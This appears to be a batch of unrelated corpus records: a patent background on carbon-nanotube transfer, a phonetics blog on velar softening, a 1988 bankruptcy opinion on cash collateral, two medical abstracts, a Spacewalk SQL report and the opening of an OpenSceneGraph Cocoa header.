As nanomaterial structures, such as carbon nanotubes and semiconductor nanowires, are the product of recent discoveries, their applications and uses are widely undeveloped and undiscovered. The discovery of carbon nanotubes by Sumio Iijima, a Japanese physicist, in 1991 may ultimately prove to be one of the most significant discoveries of the twentieth century as it spurned the growth of research in the 1-D nanomaterials revolution. Prior to Dr. Iijima's discovery, solid state carbon was know to appear only in four basic structures: “diamond structures,” “graphite structures,” “non-crystalline structures,” and “fullerene molecules.” In 1991, Dr. Iijima discovered a tube-shaped material made up of carbon in a continuous hexagonal mesh and with a diameter measuring on the order of a nanometer, one-billionth of a meter. The far-reaching benefits of carbon nanotubes (“CNTs”) stem from their unique and novel electronic, thermal, and structural properties. A CNT is cylindrical in structure and may be around one nanometer in diameter and up to several micrometers in length. In other words, the length of a CNT may potentially be millions of times greater than their molecularized diameter. The small diameter of the CNT is due to the fact that its tubular body is typically only a few atoms in circumference. The CNTs are hollow and have a linear fullerene structure. Due to the carbon to carbon covalent bonding and the seamless hexagonal network, CNTs are quite possibly the strongest known molecular structure. For example, the strength to weight ratio is 500 times greater than that of aluminum. CNTs have a tensile strength of 63 gigapascals (“GPa”), compared to high carbon steel at 1.2 GPa. CNTs are light, flexible, stable and generally inert.
CNTs can be formulated to exhibit varying degrees of conductivity, depending upon their chirality. The chirality, or “twist” of the nanotube structure can alter the density of the hexagonal lattice structure and thus effect the conductivity of the nanotube. Therefore, CNTs can be formulated to be either metallic or semiconductive. Metallic CNTs, exhibit electrical conductivity on the order of six times greater than that of copper. In addition to good conductance, CNTs exhibit a very high current carrying capacity. Significantly, with lengths of several microns and diameters of a few nanometers, CNTs form microtips with high aspect ratios, which are excellent field emitters.
CNTs are generally good thermal conducts in the axial direction, along their tube axis, and insulative in the radial direction, along an axis lateral to the tube axis. Furthermore, CNTs are incredibly efficient conductors of heat, with a potential thermal conductivity of 3000 W/mK.
CNTs can be of two main types of structures, Multiwalled Nanotbues (MWNTs) and Single Walled Nanotubes (SWNTs). A SWNT is simply one cylindrical hexagonal carbon structure that can be very long in length. MWNTs have multiple layers of encapsulated cylindrical hexagonal carbon structures. MWNTs can have multiple SWNTs concentric cyldinders inside a large SWNT or one SWNT inside a larger SWNT.
Carbon nanotubes are generally produced by three main techniques, arc discharge, laser ablation and chemical vapor deposition. In arc discharge, a vapor is created by an arc discharge between two carbon electrodes with or without catalyst. Nanotubes self-assemble from the resulting carbon vapor. In the laser ablation technique, a high-power laser beam impinges on a volume of carbon-containing feedstock gas (methane or carbon monoxide). Laser ablation typically produces a small amount of clean nanotubes, whereas arc discharge methods generally produce large quantities of impure material.
Chemical vapor deposition (CVD) synthesis is achieved by putting a carbon source in the gas phase and using an energy source, such as a plasma or a resistively heated coil, to transfer energy to a gaseous carbon molecule. Commonly used gaseous carbon sources include methane, carbon monoxide and acetylene. The energy source is used to “crack” the molecule into reactive atomic carbon. Then, the carbon diffuses towards the substrate, which is heated and coated with a catalyst (usually a first row transition metal such as Ni, Fe, Mo or Co) where it will bind. Carbon nanotubes will be formed if the proper parameters are maintained through the vapor liquid solid growth mechanism. Excellent alignment, as well as positional control on nanometer scale, can be achieved by using CVD. Control over the diameter, as well as the growth rate of the nanotubes can also be maintained. The appropriate metal catalyst can preferentially grow single rather than multi-walled nanotubes.
The current applications and potential applications for CNTs are amazingly varied and wide in range. The CNTs superior and unique properties afford an almost unending number of novel implementations and improvements to a variety of fields. CNTs are currently used or contemplated for use in nanoelectronics, biosensors, chemical sensors, optical sensors, solar cells, magnets, slick surfaces, combat jackets, transistors, oscillators, high strength composites, and superconductors.
The unique properties of CNTs present novel possibilities with respect to nanoelectronics, biosensors, chemical sensors, optical sensors, and similar devices. For example, nanomaterials are ideal for chemical sensors because they have very large surface areas. This large surface area translates into large adsorption rates of gases and vapors. Similarly, every atom in CNT is on the surface, thus it is incredibly sensitive to the environment, and small changes in charge environment can drastically change the electrical properties of the CNT. Indeed, SWNT field effect transistors have been fabricated wherein a single SWNT or a film of multiple SWNTs forms the conducting channel. Therefore, the conductance of the channel will change upon exposure of SWNT to certain chemical gases. Chemical sensing can thus be executed by monitoring the conductance of the channel.
A significant potential application for carbon nanotubes that has been the subject of much research and development is their potential use in flexible electronic devices. Conventionally, flexible electronic devices have relied upon advancements in semiconductor fabrication. In particular, the plasma-enhanced deposition of amorphous silicon onto polymer substrates has been utilized to create flexible semiconductor devices. Despite its advantages, the use of amorphous silicon in flexible electronic devices has significant drawbacks. For instance, in general, the processing temperature requirements for amorphous silicon limit its compatibility to a small number of polymers. Furthermore, the low transport mobility of amorphous silicon, on the order of 1 cm2/Vs, limits the applications in which the resulting flexible electronic device can be utilized.
The use of carbon nanotubes has been contemplated to overcome the inherent problems of amorphous silicon in flexible electronic device applications. Carbon nanotubes have transport mobilities, which are several orders of magnitude greater than amorphous silicon. The performance of random CNT network devices has demonstrated electron mobility as high as 270 cm2/Vs and transistor on-off ratios as high as 10,000. Therefore, a significant desire exists to be able to incorporate CNTs into flexible electronic devices. Unfortunately, many problems exist in the compatibility of CNTs with flexible polymer substrates. More specifically, the synthesis of CNTs directly onto polymer substrates is not feasible due to the high temperatures or harsh chemical environments under which they are synthesized.
Conventional methods have attempted to address the challenge of incorporating CNTs into flexible polymer substrates with solution-based transfers. Solution-based carbon nanotube transfer processes, such as spin casting, flow-directed alignment, electrophoretic trapping, chemical functionalization, or microcontact printing, involves suspending the CNTs in an “ink” solution. The solution may act as the vehicle to transport the CNTs to the surface of the polymer substrate.
For example, U.S. Pat. No. 6,436,221 to Chang, et al., filed Feb. 7, 2001, describes a solution-based method of transfer of carbon nanotubes to a substrate. In the disclosed method, a conductive pattern is coated on a substrate by screen-printing a conductive slurry containing silver through a patterned screen. Next, a CNT paste, consisting of an organic bonding agent, resin, silver powder, and CNTs, is screen-printed through a mesh pattern screen onto the substrate. Subsequently, the substrate is baked at a predetermined temperature to remove the solvent, then sintered to solidify the CNT to the conductive pattern. Finally an adhesive film, such as tape is closely attached on the cathode substrate and then is then removed so as to discard the badly bonded CNT portions and to vertically pull up a portion of the CNT which laid down during the sintering.
U.S. Patent Application No. 2003/0092207 to Yaniv, et al., published May 15, 2003, describes a solution-based CNT transfer process. Yaniv, et al. discloses a process involving obtaining carbon nanotube powder, grinding the powder into shorter length CNTs, and mixing the powder in a solution in an ultrasonic process to disperse the CNTs. After the mixture solution has been created it is spayed onto the substrate with an atomizer, then tape is used to remove a portion of the CNTs from the surface, thereby leaving a layer of CNTs on the surface of the substrate.
U.S. Patent Application No. 2005/0165155 to Blanchet-Fincher, published Jul. 28, 2005, describes a method of creating a composition comprising carbon nanotubes and conductive polyaniline. The method disclosed involves creating a mixture of carbon nanotubes and conductive polyaniline by dispersing carbon nanotubes in xylenes and then adding a solution of doped polyaniline to the dispersion. Subsequently, a solution of insulating polymer is added to the dispersion, the dispersion is deposited on a substrate, and the solvent is allowed to evaporate. The result is a polymer composition containing carbon nanotubes.
Many problems exist with the solution-based CNT transfer methods, such as the methods disclosed in Chang, et al., Yaniv, et al. and Blanchet-Fincher, due to, among other things, the fact that the carbon nanotubes are fragile, vulnerable to separation, and randomly oriented in the solution. The random orientation in the solution results in a random orientation of the carbon nanotubes on the substrate. This random orientation of the CNTs can be detrimental to many applications, including creating non-optimized electrical field distribution and resulting in shielding effects between adjacently positioned CNTs. Additionally, the inks and solvents used to transfer the carbon nanotubes must be compatible with the polymer substrate. This significantly limits the choice of ink and solvents and the choice of polymers. Furthermore, the flexible electronic devices created by these solution-based transfer methods are very vulnerable, due to the fact that the CNTs simply reside on the surface of the substrate to which they applied. The development of solution-based CNT transfer inks require extensive fabrication time cycles. The create of the ink requires a significant amount of time to disperse the CNTs throughout the solution. Furthermore, the solution-based method involves many steps. Even after the solution has been applied to the substrate, the solution must be printed and the “solvent” evaporated (requiring more processing time). Additional steps must be taken if control over the arrangement and orientation is desired in solution based deposition techniques.
Similar problems are encountered in the manufacture of flexible electronic devices that incorporate nanomaterial structures other than CNTs. For example, known methods for the incorporation of nanowires into flexible polymer substrates suffer from the same problems as the described conventional methods for CNT transfer. In transferring the nanowires to a polymer substrate, the integrity of the nanowire structure is often lost or degraded and the nanowires are only tenably attached to the polymer substrate.
Accordingly, there is a need in the art for an efficient method by which to create an effective flexible electronic device incorporating nanomaterials.
Additionally, there is a need in the art for an efficient method to mass produce flexible electronic devices that incorporate nanomaterials with minimal processing steps.
Additionally, there is a need in the art for an efficient method to mass produce flexible electronic devices that incorporate carbon nanotubes with minimal processing steps.
Additionally, there is a need in the art for method to transfer carbon nanotubes to a flexible electronic device.
Additionally, there is a need in the art for method to transfer nanowires to a flexible electronic device.
Additionally, there is a need in the art for a method to transfer nanomaterials to a variety of polymer types.
Additionally, there is a need in the art for a method to transfer carbon nanotubes to a variety of polymer types.
Additionally, there is a need in the art for a flexible electronic device comprised of systematically arranged nanomaterials.
Additionally, there is a need in the art for a flexible electronic device comprised of systematically arranged carbon nanotubes.
Additionally, there is a need in the art for a flexible electronic device comprised of systematically arranged nanowires.
Additionally, there is a need in the art for method to create a flexible electronic device comprised of systematically arranged carbon nanotubes.
Additionally, there is a need in the art for method by which to integrate carbon nanotubes into a polymer substrate in a manner that enable control over the general orientation of a portion of the carbon nanotubes.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Everything to do with phonetics. Please note: comments not signed with your genuine name may be removed.
Thursday, 9 February 2012
centrifugal
A footnote to yesterday’s discussion of garage:
The leader of UKIP (the United Kingdom Independence Party, whose main policy is that the UK should secede from the European Union) is Nigel Farage. The Independent on Sunday newspaper this week had an interview with him, in the course of which the interviewer asked how we should pronounce his surname.So Mr Farage himself says ˈfærɑːdʒ (or possiblyˈfærɑːʒ), but he doesn’t mind much what anyone else says.
* * *It seems to be five years since I last wrote (blog, 23 Jan 2007) about the vagaries of Velar Softening — the principle by which velar k and g change to coronal s and dʒ respectively in Latinate words when the following vowel is spelt i, e, ae, oe, or y. From the point of view of spelling-to-sound rules, Velar Softening is responsible for the fact that before the vowel letters mentioned the letter c is almost always pronounced s in modern English, while the letter g is quite often dʒ (but NB the many Germanic words such as give, get).
Historically, before the Great Vowel Shift of six hundred years ago, this made sense. You had palatalization (softening) before palatal vowels. Since the GVS its naturalness has disappeared, which is why we now have various anomalies. For example, we may be uncertain about the consonants in loci (plural of locus) and fungi (plural of fungus).
One disturbing factor is the power of morphological analogy (this term is self-referential!). Given that the word analogy is əˈnælədʒi, there is pressure for the related analogous to be əˈnælədʒəs rather than the standard əˈnæləɡəs. Given that meningitis has dʒ, there is pressure for meningococcal to have it too. Yet you don’t generally expect g to be dʒ before o.
I was thinking about the word centrifugal. With the hesitation about its stress pattern, in BrE at least, it might be a good word to include in my next pronunciation preference poll: do we prefer ˌsentrɪˈfjuːɡl̩ or senˈtrɪfjʊɡl̩? Latin fŭga ‘flight, fleeing’ has a short vowel, so we “ought” to give this word antepenultimate stress (as apparently Americans always do). But the contrast with its antonym centripetal exerts a countervailing pressure for penultimate stress. As Newton discovered, the orbits of the planets depend on the balance of centrifugal and centripetal forces.
I should imagine that the noun centrifuge is about as well known (or not) as the adjective centrifugal. But there doesn’t seem to be any analogical contamination from one to the other. I have never heard anyone use dʒ in centrifugal, or for that matter g in centrifuge.
The interviewer, a youngish, serious-looking bloke with the unexotic name Robert Chalmers, knows his readers and know what they know.
His readers have paid a substantial sum for a British newspaper which may have the same tabloid shape and size as the Express and the Mail on Sunday (a format more associated with the late News of the World), but which is aimed at the same market as the broadsheet Observer and Sunday Times. The interview (with background analysis and comment) is long — enormously more so than you'd find in the popular press.
What these rears know is:
• There are three basic ways of pronouncing garage in Britain. Some readers may know of extra American pronunciations, but these would not be considered relevant. IoS readers are unlikely to be consciously aware of variations within the three basic pronunciations — and even less likely to care.
• By contact there is only one basic way of pronouncing barrage in Britain.
Th IoS and the daily Independent are struggling to maintain their readership in Britain. I doubt whether they have much of an international following.
Anyway, I looked it up in LPD and while I wasn't that astonished to find only one BrE pronunciation for barrage (I was a bit, though), I newly learned that AmE seems to make a difference between the meanings of 'dam' and 'artillery fire'.
I said that morphological analogy was a disturbing factor, in the sense that it has disturbed the smooth functioning of the velar softening rule (rule in the phonological sense, not any prescriptive sense). I didn't say I founnd the pronunciation əˈnælədʒəs disturbing.
'wouldn't imagine that the noun centrifuge is about as well known (or not) as the adjective centrifugal.'
[For some reason, I couldn't bring myself to write shouldn't.]
I for one never came across any reference to such an object until well advanced in adulthood. Centrifuges are found in very specialist laboratories and mechanisms. But the concept centrifugal force is used in popular explanations of stuff that children often hear long before it comes up in school physics lessons.
As a matter of fact, I personally know the device primarily if not exclusively from apicultural contexts, and as I was reading your lines quoted by David I could not help wondering whether you expected many to have had much contact with bee-keeperdom.
Loci is surely a rarity in English. The only use familiar to me — although not generally familiar — is the system of imagined stopping points on a journey into which you place imagined objects in order to memorise a sequence. Because of the antiquity and antique associations. I'm inclined to call them ˈləʊsai.
The pronunciation of fungi in English is complicated by the fact that so many of us are familiar with the sound of the Italian funghi
I know 'loci' in the sense of a place in a book, like the 'locus classicus' for something or other to be in Leibniz' 'Theodicy' or some such. Alongside that, there are other 'loci', less or not at all 'classici', yet sometimes deserving attention for a reason.
This from books written in English or something like English by to a large extent NNS, thus the use may be totally un-English, even though popular in the polyglot community of Scholars.
I learnt locus, loci when doing maths at about age 13. Didn't you, David? "A circle may be defined as the locus of points in a plane at a fixed distance from a given point." (OK, I did take Additional Maths O level at age 14.)
this I have known under a Polish, and then a German name, from more or less the same age onwards, the latter being 'geometrischer Ort'. Obviously, in English an adjective like 'geometric(al)' is not part and parcel of the expression.
An Italian philosopher of law, Amedeo G. Conte, has formulated the concept of a 'deontic locus' (luogo deontico), by analogy to 'luogo geometrico'. Something or other can be defined as a 'deontic locus' of a set of rules if it acts in conformity with these rules. To be more precise, an ideal rule-conformer is a 'luogo deontico' of the rules in question.
Without having heard (or read, for that mattter) 'fungi' and 'loci' much (the latter somewhat more often) I would assume, going by what I know Latin words in English are generally pronounced like, that these words sound 'funj-eye' and 'l-owe-s-eye' in the mouths of the Anglo-Saxon. That they should say 'fung-eye', under the influence of the Italian form 'funghi', perplexes me.
That way of pronouncing Latin was challenged in the nineteenth century and a movement to teach a more authentic system in British schools made steady progress until by the end of last century hardly anybody used the old ways of saying Latin words in Latin.
This has influenced the way we pronounce the words and phrases that have survived in legal and ecclesiastical texts. I'm not sure how many lawyers today have studied Latin, but in the latter part of the last century a lot of lawyers would have studied the language in school with the 'reformed' pronunciation.
Fungi is not like Benedicite or decree nisi — which can be heard in either pronunciation. It's a word that we have to use for ordinary observation of nature, and for ordinary culinary reference to thinks which are not mushrooms in the very narrow sense we use the word here.
'Fungi is not like Benedicite or decree nisi — which can be heard in either pronunciation. It's a word that we have to use for ordinary observation of nature, and for ordinary culinary reference to thinks which are not mushrooms in the very narrow sense we use the word here.'
no doubt. And also in medical contexts. I fail to see, tho', how this would explain the invasion of an Italian-inspired pronunciation.
It's hard to say whether ˈfʌŋgi is 'due to Italian influence' or simply the way the speaker learned to pronounce Latin. 'Reformed' pronunciation requires something like ʊ for letter u as a short vowel — we reserve an u character for the long vowel, just as we do (most of us) in English. I think most English people who have learned Latin for any length of time use ʊ and u: — but it's easy to see why so many substitute the opposition typical of RP and many other accents ʌ and u:.
There again, for many English speakers it's probably just the 'hard G' (i.e. g) in fungus that motivates a similar g in the plural form. This factor together with a half-remembered echo of the old pronunciation is presumably responsible for that strange pronunciation which I'd forgotten about until Kilian mentioned it: ˈfʌngaɪ.
I can't stress often enough that for many, many English-speakers fungi is an unfamiliar word for an unfamiliar concept. Fungus is a very familiar word — but only when denoting a particular type of soft messy fungus. It's a great surprise to most of us when we first lean that mushrooms are fungi.
Fungii s a word which we seldom hear. Funghi is a word which many of us hear quite often in English sentences relating to Italian food.
When we read the word fungi, few if any would instinctively say ˈfʌndʒaı — and relatively few have learned that pronunciation. That leaves ˈfʌndʒi: as quite a natural response, but a surprising number of us prefer ˈfʌŋgi:.
A short practical question: which pronunciation, if any, shall I recommend to my students: mine (ˈfʌndʒaı) or some other?
Remember that we are all educated people not trying to pretend we are Britons or anything like it, and quite happy to be recognised for what we are, yet on the other hand we want to sound comprehensible to Britons as well as to great many English-users of our linguistic and stylistic register from all over the world.
the pronunciation 'funj-eye' I know as 'the' orthodox pronunciation of 'fungi' I have always made sense of in this way: first, the 'g' becomes a 'j', under the influence of the following front vowel 'i' ('ee'), like in all Latinate words. The, the Great Vowel Shift enters the scene and trasformes the 'ee' into an 'eye'.
(In Italian it is 'funghi' not 'fungi' PROBABLY by analogy to the singular form, which is 'fungo' not 'fungio'. I wish I had been a better language historian of Italian, but that is what I spontaneously think.)
Swere Spraak. It could have been Nedderduetsch, Low German, but I think it is misfigured High German. The original saying is: 'Deutsche Sprache - Swere Spraak', as said by a foreigner trying hard and failing to learn correct German. 'sw-' reflects his inability to pronounce the 'shv-' cluster, and 'Spraak' is both his inability to pronounce 'ch' and his adversity to final 'schwa's'. I sort of kidnapped this saying, as I am growingly convinced, English is much 'swerer' than anything you can stumble upon in 'Cherman'
Interesting that the velar softening in English is linked to palatalisation. In Russian, velar softening from g to ʒ and from k to ʧ are both common - e.g. from nouns "книга" "рука" you get adjectives "книжный", "ручный" - but where these occur, it is distinct from palatalisation (as in "в книге", "в руке").
The palatalisation of /g/ happened first in the prehistory of English.
The core of those words where we speak of 'hard and soft g' came to us from Latin via French. First in Latin the /g/ phoneme developed a palatalised allophone before front vowel. Then the allophone became a phoneme, which in Old French developed into affricate dʒ. We've kept the sound, while Modern French has simplified it to fricative ʒ.
I read that for our one palatalisation of velars (in Latin) in prehistory, Russian had three (in Proto-Slavic). The first palatalisation was similar to ours: a single /g/ phoneme in Proto-Indo-European divided into two allophones, which eventually became two phonemes in Proto-Slavic. Hence the pairs of stems книг ~книж and рук~руч.
Still in Proto-Slavic, the adjective-forming suffix -ьн- attached to the stem with the palatalized final consonant. Hence книжный, ручный.
Where Proto-Slavic differs from Latin is in the development of palatalised allophones of consonants other than velars — allophones which developed into phonemically distinct 'soft consonants'.
As part of this development allophones of the consonants /k/ and /g/ were also allowed to stand before both front and back vowels. It's questionable whether the non-palatalised and palatalized allophones can be said to have become phonemes in Russian. Some of the reference books recognize 'hard and soft' к on the grounds of rare forms like ткёт a number of foreign words with palatalized к before а, о or у. Palatalised г is, I think, generally treated as an allophone.
I may have misunderstood, but I understand that the first Proto-Slavic palatalization was forced on the velar by a following palatal —the consonant changed but the vowel didn't — while the 'syllable harmony' process that created hard and soft consonants allowed for different forms of interaction — either the consonant or the vowel could change.
|
{
"pile_set_name": "Pile-CC"
}
|
87 B.R. 25 (1988)
In re Max J. TRIPLETT, Debtor.
Bankruptcy No. 87-52640-A.
United States Bankruptcy Court, W.D. Texas, San Antonio Division.
June 17, 1988.
William R. Davis, Jr. of Law Offices of Garvin Stryker, San Antonio, Tex., for debtor.
J. Scott Sullivan of Kaufman, Becker, Clare & Padgett, Inc., San Antonio, Tex., for NBC Bank-Colonnade, N.A.
MEMORANDUM OPINION
R. GLEN AYERS, Jr., Chief Judge.
I. INTRODUCTION
Before the Court are the Debtor's Application to Use Cash Collateral and NBC-Bank Colonnade's Motion to Restrict Use of Cash Collateral and for Adequate Protection. However, this opinion is not about "adequate protection" as that term is used in § 363 of the Bankruptcy Code. Rather, it is about § 1112(b), a most sadly displaced statutory provision. To reach that problem, however, the "adequate protection" problem must be addressed.
The Facts [Are Undisputed]
The debtor, Max Triplett filed a Chapter 11 petition on October 8, 1987. Then (and now) he owed the National Bank of Commerce Colonnade, N.A., about $250,000.00. That debt is secured by property appraised at $337,000.00, so the debt continues to accrue interest, charges, and so *26 forth. See § 506(c). The collateral for the debt is:
COLLATERAL VALUE
Real Property $200,000.00
1928 Pierce Arrow 60,000.00
1972 Rolls Royce 25,000.00
J.D. 310 Backhoe 8,000.00
J.D. 570A Grader 18,000.00
1981 Tampo Roller 8,000.00
J.D. Loader (Tractor) 18,000.00
___________
TOTAL VALUE $327,000.00
The rents from the real property are also collateral for the NBC loan. The rents are presently $1,661.16 per month.
Naturally, the debtor wants to use the rental income; the creditor wants to restrict use of this "cash collateral".
The Law [Is Disputed]
The parties agreed on only two points: The rents are "cash collateral" under § 363 and the creditor NBC has acted to "perfect" its interest in the rents using the appropriate mechanisms set forth in In re Village Properties, Inc., 723 F.2d 441 (5th Cir.1984) and In re Casbeers, 793 F.2d 1436 (5th Cir.1986).
The disagreement is very simple. The debtor wishes to use the rental income ("cash collateral") to service expenses of the property and also to pay general expenses of the case in other words, the debtor wishes to use the cash collateral without restriction. NBC disagrees and alleges that the debtor has not offered "adequate protection" for the cash collateral. The debtor's rejoinder is to simply point to the $80,000 equity cushion.
A. Adequate Protection
Secured creditors are entitled to "adequate protection" where the debtor retains use or possession of collateral during the pendency of a proceeding. The term is used in § 362, 363 and 364, and means the same thing in each section. The term is, of course, not defined but merely "illustrated" by § 361. See In re Timbers of Inwood Forest Assoc's Ltd., 793 F.2d 1380, 1388 (5th Cir.1986) (the original panel opinion).
Most courts have ruled that any protection is "adequate" as long as the secured creditor's interests are preserved at "status quo" or can be protected from dissipation by cash payments, replacement liens or the like. Occasionally, cases arise in which the debtor's conduct as opposed to actual peril to the creditor's interests mandates a finding that there is no "adequate protection". See generally 2 Collier on Bankruptcy, § 361.01[5] (15th ed. 1988).
Where cash collateral is involved, there has been some debate as to whether an "equity cushion" is ever sufficient to provide adequate protection. With ordinary collateral, an equity cushion is generally considered to be sufficient (although not necessary). See, e.g., In re Alyucan Interstate Corp., 12 B.R. 803, 4 C.B.C.2d 1166, 1072-74 (Bankr.D.Utah 1981) (equity cushion not required).[1]
Where cash is involved, however, at least one court has held that the presence of an equity cushion does not alone justify unlimited use of cash collateral. In re Earth Lite, Inc., 9 B.R. 440, 444 (Bankr.M.D.Fla. 1981):
"[T]his Court is satisfied that the Debtor should not be permitted to use cash collateral without making some payments to the secured party just because it has, at the commencement of the case, a meaningful equity cushion in the collateral. To accept this proposition would mean that a debtor may freely use cash collateral until the collateral is reduced *27 to the amount of indebtedness during which time the secured party is deprived of income, for which it bargained when the lien was granted."
But Judge Paskay's holding is not correct. First, as Alyucan demonstrates, the presence of an equity cushion is not required under the concept of adequate protection only the preservation of the value of the lien is required. See In re Alyucan Interstate Corp., 12 B.R. 803, 4 C.B.C.2d 1066, 1074 (Bankr.D.Utah 1981). Therefore, mere "consumption" of the cushion does not alone violate the concept of adequate protection.
Further, the income stream is almost never "bargained for"; use of rent assignment clauses and other devices are merely collateralization techniques. The creditor may be interested in the stream but has in no sense bargained to receive the stream in a State like Texas where the creditor cannot be a mortgagee in possession. See In re Max Tripplet, 84 B.R. 84 (Bankr.W.D. Tex.1988).
Also, to say that the creditor expected to receive the income stream is not appropriate where the creditor clearly has bargained for collateral of a value far in excess of the amount of the debt.
Rather, restriction of the use of cash collateral should only occur where the facts show that failure to restrict use may "impair" the creditor and deny the creditor adequate protection. And, while the burden may be upon the debtor, the debtor has clearly met its burden in this case. See In re Martin, 761 F.2d 472, 477 (8th Cir.1985).
Conclusion
In cases where the debtor clearly demonstrates that the value of collateral adequately protects the interests of the secured creditor, income from the collateral i.e., § 363 "cash collateral" may be used by the debtor for the general benefit of the estate and need not be devoted exclusively to the protection of the creditor or the collateral.
Comment[2]
This case and opinion reflect the concerns set forth in In re Sentry Park Ltd., 87 B.R. 427, 431 n. 6 (Bankr.W.D. Tex.1988) and R. Haines, Good Faith: An Idea Whose Time Has Come & Gone, North Bankr.L.Adv. 1-8 (April 1988) (Callaghan & Co.). Both Judge Clark and Mr. Haines argue that motions for relief under § 362 should not be substituted for proceedings under § 1112(b). The same is true of proceedings under § 363 to restrict use of cash collateral.
The real concerns of the creditor bank are set forth in its brief:
While more than 120 days has elapsed since the filing of bankruptcy, Triplett has failed to sell a single piece of the personal property. Triplett has never alleged that a Rolls Royce, a 1928 Roadster, or four pieces of construction equipment would be necessary for his reorganization. . . . Triplett . . . is not willing to part with his classic cars.
In situations like this, if the creditor believes the case is being delayed merely so that a rich man can protect his toys, the proper approach is § 1112(b):
Except as provided in subsection (c) of this section, on request of a party in interest or the United States trustee, and after notice and a hearing, the court may convert a case under this chapter to a case under chapter 7 of this title or may dismiss a case under this chapter, whichever is in the best interest of creditors and the estate, for cause, including
(1) continuing loss to or diminution of the estate and absence of a reasonable likelihood of rehabilitation;
(2) inability to effectuate a plan;
(3) unreasonable delay by the debtor that is prejudicial to creditors;
(4) failure to propose a plan under section 1121 of this title within any time fixed by the court;
. . . .
*28 Here, the focus on collateral and its use interferes with proper analysis of the case. Instead of being concerned with one item of "cash", the creditor should draw the court's attention to all of the problems with the case so that the debtor can either be placed on a timetable[3], the case converted, or the case dismissed.
NOTES
[1] For some reason, commentators seem to believe that Alyucan rejects the utilization of an equity cushion to provide adequate protection. That's simply not the case. All Judge Mabey did in dicta was to discuss his objection to the mechanical application of an equity cushion analysis. Mabey rejected those cases which would require relief from stay "mechanically" (or "automatically") upon impairment of a cushion, or upon absence of a cushion, or in either case. The entire discussion of the "equity cushion" is confined to situations in which the stay should not be lifted even though there is no equity cushion. For articles which seem to miss the point of the opinion, See, e.g., Comment, § 364(d) Superpriority Financing: Has Secured Creditor Met His Match?, 5 Bankr. Dev. J. 109, 118-119 (1988); Flaschen, Adequate Protection for Oversecured Creditors, 61 Bankr. L.J. 341, 344-45 (1987).
[2] The court apologizes to counsel for indulging in the insertion of this comment, for both lawyers had to put up with this sort of thing when they were my students.
[3] Courts in this district frequently order the debtor to produce a plan or else within a specified period of time. The "or else" may be relief from stay, dismissed, conversion, or appointment of a trustee.
|
{
"pile_set_name": "FreeLaw"
}
|
[Sinusoids--elements of the circulatory bed of the human heart].
The literature concerning the problems of myocyrdial sinusoids has been analysed and morphological investigation of 98 human hearts has been performed. As demonstrates the comparison of the literature data, the term "sinusoid" in the human heart is applied to different structures. In some cases--to designate dilated areas of the venous part of the blood bed in the ventricular walls, in others--"hollow spaces", "intercellular spaces" and Vieussens--Thebesius vessels. Combining methods of intravascular injections and studying serial histological sections, it has been found that the sinusoids--the "hollow spaces", the "intercellular spaces", the "Veussens--Thebesius vessels" present the areas of intertrabcular spaces, which get into the planes of some sections, not being components of the myocardial blood bed. Spatial angioarchitectonics of the sinusoids--dilated areas in the venous part of the myocardial blood bed have been investigated by means of the plastic reconstruction method. It is suggested to apply the term "sinusoids" only to the given parts of the cardiac blood bed.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
[Increasing the percentage of vaginal birth in the private sector in Brazil through the redesign of care model].
To reduce the percentage of cesareans among pregnant women at UNIMED Jaboticabal by redesigning the care delivery model. Descriptive study conducted at an institution in São Paulo State starting in 2012 to propose the redesign of the care mode based on Continued Improvement Science adapted to the health area. To measure the results of changes we selected nine indicators and their targets. The percentage of natural births reached the target of 40% after seven months of implementation of the interventions. The percentage of natural births reached 66% among pregnant women in SUS. The perinatal mortality rate decreased by 25% from 2012 to 2014, and the prematurity rate was 3 per 100 live births in 2014. The percentage of pregnant women from UNIMED with six or more prenatal consultations reached 95%. The hospital costs for childbirth care decreased by 27% compared to 2012 and 2013. This reduction was not sustainable and the per capita cost returned to the same level in 2014. The remuneration of all obstetricians increased by 72% from 2012 to 2014. Unimed's costs attributed to the neonatal intensive care unit (NICU) decreased by 61% from 2012 to 2013. The cost was the same for 2013 as it was for 2014 while the admission rate among newborns at UNIMED decreased by 55%. The percentage of pregnant women participating in courses to prepare for birth did not reach the goal set at 80%. The percentage of pregnant women satisfied and very satisfied with care delivery reached 86%. This project achieved its objectives by reducing the percentage of C-sections among pregnant women of UNIMED Jaboticabal representing a concrete example of achieving the Triple Aim in health: to improve the experience of care and the health outcomes of populations and individuals and to perform these two tasks at a lower cost.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
synopsis:
Display system custom info
description:
Display custom info for all systems in Spacewalk with any custom info associated
columns:
server_id Server id
org_id Organization id
server_name Server name
key Custom info key
value Custom info value
sql:
select * from (
select rhnServer.id as server_id,
rhnServer.org_id as org_id,
rhnServer.name as server_name,
rhnCustomDataKey.label as key,
rhnServerCustomDataValue.value as value
from rhnServer join rhnServerCustomDataValue on rhnServer.id=rhnServerCustomDataValue.server_id join rhnCustomDataKey on rhnServerCustomDataValue.key_id=rhnCustomDataKey.id
) X
-- where placeholder
order by org_id, server_id
|
{
"pile_set_name": "Github"
}
|
/* -*-c++-*- OpenSceneGraph - Copyright (C) 1998-2006 Robert Osfield
*
* This library is open source and may be redistributed and/or modified under
* the terms of the OpenSceneGraph Public License (OSGPL) version 0.0 or
* (at your option) any later version. The full license is in LICENSE file
* included with this distribution, and on the openscenegraph.org website.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* OpenSceneGraph Public License for more details.
*/
/* Note, elements of GraphicsWindowX11 have used Prodcer/RenderSurface_X11.cpp as both
* a guide to use of X11/GLX and copiying directly in the case of setBorder().
* These elements are license under OSGPL as above, with Copyright (C) 2001-2004 Don Burns.
*/
#ifndef OSGVIEWER_GRAPHICSWINDOWCOCOA
#define OSGVIEWER_GRAPHICSWINDOWCOCOA 1
#ifdef __APPLE__
#ifdef __OBJC__
@class GraphicsWindowCocoaWindow;
@class GraphicsWindowCocoaGLView;
@class NSOpenGLContext;
@class NSOpenGLPixelFormat;
@class NSWindow;
@class NSView;
#else
class GraphicsWindowCocoaGLView;
class GraphicsWindowCocoaWindow;
class NSOpenGLContext;
class NSOpenGLPixelFormat;
class NSWindow;
class NSView;
#endif
#include <osgViewer/GraphicsWindow>
#include <osgViewer/api/Cocoa/GraphicsHandleCocoa>
// we may not include any cocoa-header here, because this will pollute the name-sapce and tend to compile-errors
